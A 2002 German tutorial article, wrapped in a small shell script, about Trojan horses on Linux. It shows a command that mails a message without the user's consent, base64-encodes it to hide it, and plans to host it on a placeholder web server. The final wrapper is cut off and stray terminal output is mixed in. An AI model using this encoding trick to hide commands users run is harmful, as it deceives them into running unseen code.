Name="Trojanische Pferde"
Stich="Trojanisches_Pferd Pferd Troia Troja mimencode uuencode uudecode Virus"
Zeit="Don Apr 18 19:28:01 MEST 2002"
Kurz="Dieser Artikel erläutert die vielen Möglichkeiten Trojanischer
Pferde, und wie man sie abwehren kann."
Lang="
Der Name "Trojanisches Pferd" kommt von der Antike: Volk A belagert
Stadt B, kommt aber nicht hinein. Held C kommt auf die Idee, ein großes
mit eigenen Soldaten besetztes Holzpferd zu bauen und es B zu überlassen.
B fällt auf den Trick hinein und wird erobert.
Heute wird ein Programm, welches vorgibt, ein Spiel oder sonstiges wichtiges
Programm zu sein, dem Computer schadet und/oder seinem Besitzer wertvolle Daten
liefert. In M$ Windows ist es im Allgemeinen nicht schwer, ein Programm wie
E-Mail zu verschicken, welches dann die Schadensfunktion(en) ausführt (via
Outlook sogar automatisch). In Linux ist das was anderes: Binärprogramme
laufen i.d.R. nur auf der Distribution, auf der sie kompiliert wurden. Und
Shellskripte sind zu einsichtig: Jeder Befehl, der ausgeführt wird, kann
(vor dem Start) eingesehen werden. Vorläufiges Fazit: Trojanische Pferde
unter Linux sind unmöglich.
Leider ist dieses "unmöglich" etwas übertrieben: Für
Newbies, das heißt Linuxern, die sich noch nicht so viel Wissen besitzen,
ist es möglich: Hier ist der Quellcode für ein Programm, welches
(ohne Erlaubnis des Benutzers) eine E-Mail verschickt:
`exCodes E-Mail unerlaubt versenden`
echo 'Hallo, Welt!' | mail -s .,-+= foo@bar.org
`exCodee`
Wenn man nun das Programm mit uuencode "verschlüsselt",
erhält man:
`exCodes Verschl\ü\;sselung`
Enter verification password:
Today is Pungenday, the 35th day of Discord in the YOLD 3168.
P'tang!
15 neue Mails:
Subject: Fwd: E-Kettenbriefe
Subject: E-Kettenbriefe
Subject: A
Subject: Bingo!
Subject: News
Anzahl Sekunden seit 1970: 1019151653
iblech@Hitachi:~/tLipps > cat Pfad/zum/Quelltext | uuencode -m - > /Pfad/zum/Er gebnis `exCodee`
Man erhält zum Beispiel:
`exCodes Zwischenergebnis`
begin-base64 644 -
ZWNobyAiSGFsbG8sIFdlbHQiIHwgbWFpbCAtcyAuLC0rPSBmb29AYmFyLm9y
Zwo=
====
`exCodee`
Nun muss man nur noch zwei Zeilen hinzufügen, und dann zum Beispiel auf
einen Webserver stellen (im Beispiel AlphaCentauti.univer.sum):
`exCodes Endergebnis, abzuspeichern in http://AlphaCentauri.univer.sum/troia`
cat <
Viel Spaß beim mimencoden...
"
case $1 in
Name) echo $Name; exit;;
Stich) echo $Stich; exit;;
Zeit) echo $Zeit; exit;;
Kurz) echo $Kurz; exit;;
Lang) echo $Lang; exit;;
esac
# if [ "$1" = "Name" ]; then echo $Name; fi
mself_vA="txt/0082.txt txt/0089.txt"